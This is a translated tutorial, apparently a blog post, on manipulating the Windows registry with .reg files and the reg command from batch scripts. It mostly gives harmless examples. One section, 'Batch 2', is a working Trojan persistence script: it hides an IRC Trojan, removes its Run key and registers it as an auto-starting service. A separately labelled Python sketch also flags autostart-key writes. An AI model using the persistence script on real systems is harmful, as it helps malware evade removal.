
How to operate the registry in batch processing

2025-01-19 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)06/03 Report--

This article will explain in detail how to manipulate the registry in batch processing. The editor thinks it is very practical, so I share it for you as a reference. I hope you can get something after reading this article.

First, generate .reg files from a batch file to manipulate the registry

A batch file can easily generate a .reg file using redirection operators and then import it with a command.

Here, it is important to understand how .reg files manipulate the registry.

The first line of a .reg file must be: Windows Registry Editor Version 5.00. The registry operations follow it.

(This is the same format as a file exported from the registry.)

1, create a subkey

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\TTT]

A subkey named "TTT" is created under HKEY_LOCAL_MACHINE\SOFTWARE\.

2, create a value (entry name)

The code is as follows:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\TTT]
"Name"="TTT BLOG"
"EMail"="taoether@gmail.com"
"URL"="http://www.taoyoyo.net/ttt/"
"Type"=dword:02

This creates four new values under [HKEY_LOCAL_MACHINE\SOFTWARE\TTT]: Name, EMail, URL and Type.

The type of Name, EMail and URL is "String Value".

The type of Type is "DWORD Value".

(Appendix: Windows registry value types:

REG_SZ string value

REG_BINARY binary value

REG_DWORD DWORD value

REG_MULTI_SZ multi-string value

REG_EXPAND_SZ expandable string value)

3, modify a value

Modification is relatively simple: export the entry you need to change, edit it with Notepad, and then import it again (regedit /s). It works just like creating a new one. You can modify multiple values under the same subkey at once.

4, delete a value (entry name)

The code is as follows:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\TTT]
"EMail"=-

Execute the script and "EMail" is deleted.

5, delete a subkey

The code is as follows:

Windows Registry Editor Version 5.00

[-HKEY_LOCAL_MACHINE\SOFTWARE\TTT]

[-HKEY_LOCAL_MACHINE\SOFTWARE\DDD]

After executing the script, the subkeys TTT and DDD are deleted.

6, ways to execute a .reg file

1) execute the .reg file directly

2) regedit /s *.reg (with /s, no confirmation is required)

3) reg import *.reg

7. In fact, we can also use dll files instead of reg files.

Batch processing example 1:

The code is as follows:

@echo off
rem Write the header line, then a blank line, into a new t1.reg
echo Windows Registry Editor Version 5.00>t1.reg
echo.>>t1.reg
rem Append the key and its four values
echo [HKEY_LOCAL_MACHINE\SOFTWARE\TTT]>>t1.reg
echo "Name"="TTT BLOG">>t1.reg
echo "EMail"="taoether@gmail.com">>t1.reg
echo "URL"="http://www.taoyoyo.net/ttt/">>t1.reg
echo "Type"=dword:02 >>t1.reg
rem Import silently, then delete the temporary file
regedit /s t1.reg
del /q t1.reg
pause

Batch 2: (this example is someone else's. I don't know much about it.)

When we use some older Trojans, they may generate a value under [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run (RunOnce, RunServices, RunExec)] in the registry to make the Trojan start automatically. However, this easily exposes the path of the Trojan program, which leads to the Trojan being detected and removed. By comparison, registering the Trojan program as a system service is relatively safe. Take the configured IRC Trojan DSNX as an example (named windrv32.exe).

The code is as follows:

@start windrv32.exe
@attrib +h +r windrv32.exe
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>patch.dll
@echo "windsnx"=- >>patch.dll
@sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath= c:\winnt\system32\windrv32.exe
@regedit /s patch.dll
@delete patch.dll
REM [delete the startup key of DSNXDE in the registry, register it as a system critical service with sc.exe, set its attributes to hidden and read-only, and configure it to start automatically]
@REM, this is not safer ^_^.
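Sections 1 to 5 above describe the .reg syntax, and Batch 2 imports a generated file silently with regedit /s. The following Python sketch is an added example, not code from the original article: it parses .reg text and lists deletions, writes to the Run/RunOnce/RunServices keys, and a missing header, so that a file can be reviewed before it is imported. The names parse_reg and review and the sample input are assumptions made for this example.

```python
import re

HEADERS = ("Windows Registry Editor Version 5.00", "REGEDIT4")
# Autostart keys named in the article: Run, RunOnce, RunServices.
AUTOSTART = re.compile(r"\\CurrentVersion\\Run(Once|Services)?$", re.I)
VALUE = re.compile(r'^("(?:[^"\\]|\\.)*"|@)\s*=\s*(.*)$')
TYPES = (('"', "REG_SZ"), ("dword:", "REG_DWORD"), ("hex:", "REG_BINARY"),
         ("hex(2):", "REG_EXPAND_SZ"), ("hex(7):", "REG_MULTI_SZ"))

def parse_reg(text):
    """Return (has_header, ops); each op is (action, key, value_name, reg_type)."""
    lines = [ln.strip() for ln in text.splitlines()]
    lines = [ln for ln in lines if ln and not ln.startswith(";")]
    has_header = bool(lines) and lines[0] in HEADERS
    ops, key = [], None
    for ln in lines[1:] if has_header else lines:
        if ln.startswith("[") and ln.endswith("]"):
            key = ln[1:-1].strip()
            if key.startswith("-"):      # [-KEY] deletes the key and its subtree
                ops.append(("delete-key", key[1:].strip(), None, None))
                key = None
            else:
                ops.append(("open-key", key, None, None))
            continue
        m = VALUE.match(ln)
        if not (m and key):
            continue                     # continuation line or unparsed text
        raw, data = m.group(1), m.group(2).strip()
        name = raw if raw == "@" else raw[1:-1]
        if data == "-":                  # "Name"=- deletes a single value
            ops.append(("delete-value", key, name, None))
        else:
            rtype = next((t for p, t in TYPES if data.lower().startswith(p)), "unknown")
            ops.append(("set-value", key, name, rtype))
    return has_header, ops

def review(text):
    """List what a reviewer should see before a silent import (regedit /s)."""
    has_header, ops = parse_reg(text)
    findings = [] if has_header else ["missing header line"]
    for action, key, name, _ in ops:
        if action.startswith("delete"):
            findings.append(f"{action}: {key}" + (f" -> {name}" if name else ""))
        elif action == "set-value" and AUTOSTART.search(key):
            findings.append(f"autostart write: {key} -> {name}")
    return findings

# Constructed input: what the article's Batch 2 writes to patch.dll.
PATCH = '[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run]\n"windsnx"=-\n'
print(review(PATCH))
```
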

Second, use the reg command to operate the registry

The reg command is a dedicated tool provided by Windows for manipulating the registry. It makes it easy to query, add, delete, import, export, compare and so on. Refer to the help that comes with the system for details.

REG Operation [parameter list]

Operation [ QUERY | ADD | DELETE | COPY |
            SAVE | LOAD | UNLOAD | RESTORE |
            COMPARE | EXPORT | IMPORT ]

1, query all subkeys and values

D:\>reg query hklm\software\TTT

! REG.EXE VERSION 3.0

HKEY_LOCAL_MACHINE\software\TTT
    Name    REG_SZ      TTT BLOG
    EMail   REG_SZ      taoether@gmail.com
    URL     REG_SZ      http://www.taoyoyo.net/ttt/
    Type    REG_DWORD   0x2

2, query a specific value

D:\>reg query hklm\software\ttt /v url

! REG.EXE VERSION 3.0

HKEY_LOCAL_MACHINE\software\ttt
    Url     REG_SZ      http://www.taoyoyo.net/ttt/

The hardest thing here is how to get the string we want. I was confused for a long time and finally found a way.

It turns out that there is no other good way than to use find and a for loop to extract what we need. (If you don't understand the following example, please refer to another article on this blog: DOS loop-bat/ batch for command. 2)

For example, to get the value of URL, http://www.taoyoyo.net/ttt/, you can use the following script:

The code is as follows:

@echo off
rem find keeps only the line containing "URL"; on that line %%i is the
rem value name, %%j is the type (REG_SZ) and %%k is the data
for /f "tokens=1,2,3,4,*" %%i in ('reg query "HKEY_LOCAL_MACHINE\software\ttt" ^| find /i "URL"') do set "pURL=%%k"
echo The URL value of TTT BLOG is: %pURL%

Save it as Test.bat, and the running result is as follows:

D:\>test.bat

The URL value of TTT BLOG is: http://www.taoyoyo.net/ttt/

For some reason, when the computer at home runs the "REG" command (including reg /?) on the command line, CPU usage goes to 100%; in Task Manager, CMD takes up more than 80%. I don't know why.

There is no problem running other commands, including regedit /s.

I searched online, where it is said to be caused by a Trojan horse, but after checking, it does not look like it. No relevant files were found, and there was no problem when running other commands.

I'll leave it for now. I happen to have a REG command on hand. I'll sort it out later!

Because of the virus scan, I cleaned disk C with my own Clear.bat and unexpectedly freed up a G of space. There were only a few hundred megabytes left before. There is so much rubbish in Windows. Don't forget to clean it up often!

Here are two finished batch files that automatically monitor Outlook Express. If you need them, you can click to download them.

1) OEMonitorCount.bat function: resets the count of times OE has been opened in the registry, to avoid the compression prompt that appears after more than 100 times.

2) OEMonitorSize.bat function: monitors the size of the Outlook Express mail files (*.dbx) and generates alarm logs when a file is larger than the specified size.

These two files can be added to the startup group so that they run automatically every time you boot!

The main purpose of these two is to solve some problems that often arise in the company:

1) often someone has mail files larger than a few G.

2) sometimes, after compressing as prompted, messages may be lost.

I just found that the downloaded files have been given the suffix "htm". Please remove the suffix before using them!

In addition, when downloading, please use the following links, such as: Qiannao Telecom high-speed download address, Qiannao Netcom high-speed download address. The above VIP link is intended for Qiannao users.
